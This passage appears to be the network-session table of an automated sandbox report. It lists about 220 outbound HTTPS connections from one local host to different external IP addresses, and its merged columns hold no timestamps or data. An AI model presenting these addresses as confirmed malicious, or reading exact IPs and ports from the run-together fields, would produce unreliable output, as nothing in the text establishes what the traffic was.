                                              15311192.168.2.145608857.162.245.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15312192.168.2.1441714175.253.215.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15313192.168.2.145188446.207.185.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15314192.168.2.1445616210.43.125.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15315192.168.2.1456290141.152.6.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15316192.168.2.144125862.228.191.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15317192.168.2.1444524186.74.23.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15318192.168.2.1448472108.9.125.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15319192.168.2.143647220.78.12.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15320192.168.2.1455278183.106.22.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15321192.168.2.144651048.85.246.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15322192.168.2.143645085.47.171.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15323192.168.2.143335260.145.121.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15324192.168.2.146090445.30.112.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15325192.168.2.1459998117.33.84.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15326192.168.2.143860843.131.60.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15327192.168.2.1446200131.74.183.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15328192.168.2.145012823.156.102.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15329192.168.2.145983671.62.32.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15330192.168.2.1433570197.13.209.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15331192.168.2.1460784125.4.107.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15332192.168.2.1453004144.197.91.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15333192.168.2.144016069.79.55.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15334192.168.2.1452946206.16.242.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15335192.168.2.144293012.146.9.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15336192.168.2.1436236223.61.1.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15337192.168.2.143356861.35.64.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15338192.168.2.1460632140.52.132.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15339192.168.2.145770031.10.168.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15340192.168.2.1435298118.241.175.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15341192.168.2.1435622158.222.110.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15342192.168.2.145988043.207.34.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15343192.168.2.1451658160.135.250.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15344192.168.2.1456210107.118.165.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15345192.168.2.14604008.85.238.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15346192.168.2.1440464101.228.239.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15347192.168.2.144557076.47.59.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15348192.168.2.145390668.182.140.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15349192.168.2.144344038.169.193.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15350192.168.2.1445652182.103.56.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15351192.168.2.1437074138.90.89.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15352192.168.2.1441320113.147.246.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15353192.168.2.145512217.160.10.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15354192.168.2.1457640186.148.66.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15355192.168.2.14472769.67.91.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15356192.168.2.144006889.118.167.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15357192.168.2.144216495.232.73.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15358192.168.2.145351224.32.236.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15359192.168.2.145499024.222.22.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15360192.168.2.144210641.189.202.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15361192.168.2.1433722182.61.114.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15362192.168.2.14402025.144.154.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15363192.168.2.1460846199.240.165.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15364192.168.2.143508823.108.174.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15365192.168.2.1440930221.222.207.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15366192.168.2.143473451.38.70.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15367192.168.2.1460624128.207.251.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15368192.168.2.145971631.113.250.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15369192.168.2.1452816165.13.108.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15370192.168.2.143352089.212.185.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15371192.168.2.144513071.125.134.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15372192.168.2.1455172168.235.115.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15373192.168.2.1436094104.234.53.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15374192.168.2.1459718134.16.56.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15375192.168.2.1442662129.105.148.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15376192.168.2.1437076103.121.117.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15377192.168.2.144630438.176.72.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15378192.168.2.144256454.113.201.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15379192.168.2.1433190201.38.162.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15380192.168.2.1456866223.2.150.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15381192.168.2.143730463.227.164.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15382192.168.2.1451532134.120.48.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15383192.168.2.1448450196.227.53.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15384192.168.2.1457728150.57.56.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15385192.168.2.1452148179.173.151.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15386192.168.2.1434260178.3.130.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15387192.168.2.1435322177.80.205.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15388192.168.2.144800861.5.162.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15389192.168.2.1452268144.228.3.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15390192.168.2.145848643.108.37.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15391192.168.2.145994437.191.235.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15392192.168.2.1440340144.175.150.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15393192.168.2.1442562211.215.102.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15394192.168.2.1456774126.151.221.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15395192.168.2.1438336158.137.11.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15396192.168.2.1450450130.31.231.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15397192.168.2.143313066.43.119.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15398192.168.2.144548670.41.171.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15399192.168.2.1436528155.4.168.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15400192.168.2.1437258163.59.95.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15401192.168.2.145533284.46.51.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15402192.168.2.144486098.245.158.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15403192.168.2.1436402188.162.152.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15404192.168.2.1445194160.210.55.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15405192.168.2.144646232.90.118.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15406192.168.2.1434840197.199.141.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15407192.168.2.1458138128.70.119.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15408192.168.2.1437146124.21.167.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15409192.168.2.145727437.5.98.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15410192.168.2.1442416219.215.106.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15411192.168.2.1457148131.7.124.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15412192.168.2.143695683.74.46.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15413192.168.2.1440554211.198.128.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15414192.168.2.1443752102.26.12.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15415192.168.2.145260078.38.50.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15416192.168.2.143334068.8.91.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15417192.168.2.145548281.56.206.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15418192.168.2.1455118157.244.143.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15419192.168.2.1435928169.109.37.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15420192.168.2.145482413.219.22.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15421192.168.2.1442066152.228.107.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15422192.168.2.1454204144.22.164.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15423192.168.2.143536253.70.233.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15424192.168.2.145874018.242.58.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15425192.168.2.145569224.138.27.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15426192.168.2.1433916149.124.180.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15427192.168.2.145168845.252.106.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15428192.168.2.143703495.242.31.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15429192.168.2.143312260.142.100.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15430192.168.2.1435108203.11.137.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15431192.168.2.1460940125.76.218.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15432192.168.2.1456418123.98.63.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15433192.168.2.145955427.224.56.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15434192.168.2.145943462.24.83.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15435192.168.2.1452778119.5.203.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15436192.168.2.145583676.28.72.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15437192.168.2.1460182212.76.169.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15438192.168.2.146033075.209.18.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15439192.168.2.1444560156.218.177.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15440192.168.2.145988248.170.130.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15441192.168.2.1457358189.67.224.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15442192.168.2.143768064.39.28.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15443192.168.2.143477858.112.144.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15444192.168.2.1440350144.89.91.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15445192.168.2.14517808.30.142.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15446192.168.2.144625672.236.28.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15447192.168.2.1436484207.148.26.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15448192.168.2.1454496153.150.104.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15449192.168.2.145071832.210.60.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15450192.168.2.1459444187.166.71.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15451192.168.2.145236695.100.13.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15452192.168.2.1442588185.166.47.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15453192.168.2.145438663.248.18.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15454192.168.2.1437108131.131.122.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15455192.168.2.144937464.146.236.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15456192.168.2.144850294.188.230.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15457192.168.2.1447268187.143.62.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15458192.168.2.1452264125.217.143.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15459192.168.2.144867297.17.182.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15460192.168.2.1458868171.41.88.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15461192.168.2.143695889.17.204.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15462192.168.2.144667843.137.12.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15463192.168.2.146033481.129.119.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15464192.168.2.1448750101.175.166.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15465192.168.2.1440906162.164.46.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15466192.168.2.1451032144.80.156.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15467192.168.2.1450988159.102.142.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15468192.168.2.1433444111.18.255.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15469192.168.2.145690676.11.81.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15470192.168.2.145769443.1.146.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15471192.168.2.1443298104.159.133.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15472192.168.2.1446748170.113.54.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15473192.168.2.1440802187.47.181.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15474192.168.2.144863623.242.186.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15475192.168.2.1453554196.196.208.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15476192.168.2.145949681.236.209.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15477192.168.2.143515281.154.230.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15478192.168.2.1439942149.27.175.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15479192.168.2.1438914169.6.250.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15480192.168.2.144811290.250.218.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15481192.168.2.14407268.96.49.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15482192.168.2.1450748102.44.8.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15483192.168.2.144340242.42.86.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15484192.168.2.1446958138.212.182.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15485192.168.2.1439046141.158.119.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15486192.168.2.143749259.175.57.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15487192.168.2.1460350110.212.26.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15488192.168.2.1445104130.205.93.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15489192.168.2.1438588182.216.255.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15490192.168.2.145091086.82.133.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15491192.168.2.146061089.158.231.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15492192.168.2.1448744120.41.144.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15493192.168.2.1436214100.219.178.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15494192.168.2.1447186155.176.16.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15495192.168.2.145568231.233.211.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15496192.168.2.1452068154.71.119.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15497192.168.2.1448624204.159.59.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15498192.168.2.1438796207.58.181.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15499192.168.2.143460897.113.149.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15500192.168.2.145720625.56.242.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15501192.168.2.145041272.150.136.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15502192.168.2.1449408174.170.112.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15503192.168.2.145152235.109.238.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15504192.168.2.143734062.213.117.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15505192.168.2.144541891.246.110.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15506192.168.2.1435182137.73.141.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15507192.168.2.1434086195.56.185.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15508192.168.2.1457764181.63.216.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15509192.168.2.1450644194.54.66.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15510192.168.2.145649044.221.245.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15511192.168.2.143692847.151.166.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15512192.168.2.143714657.159.48.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15513192.168.2.143582248.76.116.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15514192.168.2.143871262.170.170.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15515192.168.2.143997884.78.115.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15516192.168.2.1455564205.32.207.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15517192.168.2.144668442.191.89.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15518192.168.2.1435454179.129.176.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15519192.168.2.144096671.125.29.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15520192.168.2.145238237.142.6.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15521192.168.2.1452376101.52.178.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15522192.168.2.1453282113.42.27.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15523192.168.2.1455716210.160.152.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15524192.168.2.145576073.228.214.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15525192.168.2.14465025.172.207.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15526192.168.2.145733491.233.174.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15527192.168.2.1440506143.166.246.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15528192.168.2.1456636156.72.221.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15529192.168.2.145477213.146.20.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15530192.168.2.1458894139.73.141.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15531192.168.2.1436980116.70.67.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15532192.168.2.143324825.104.35.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
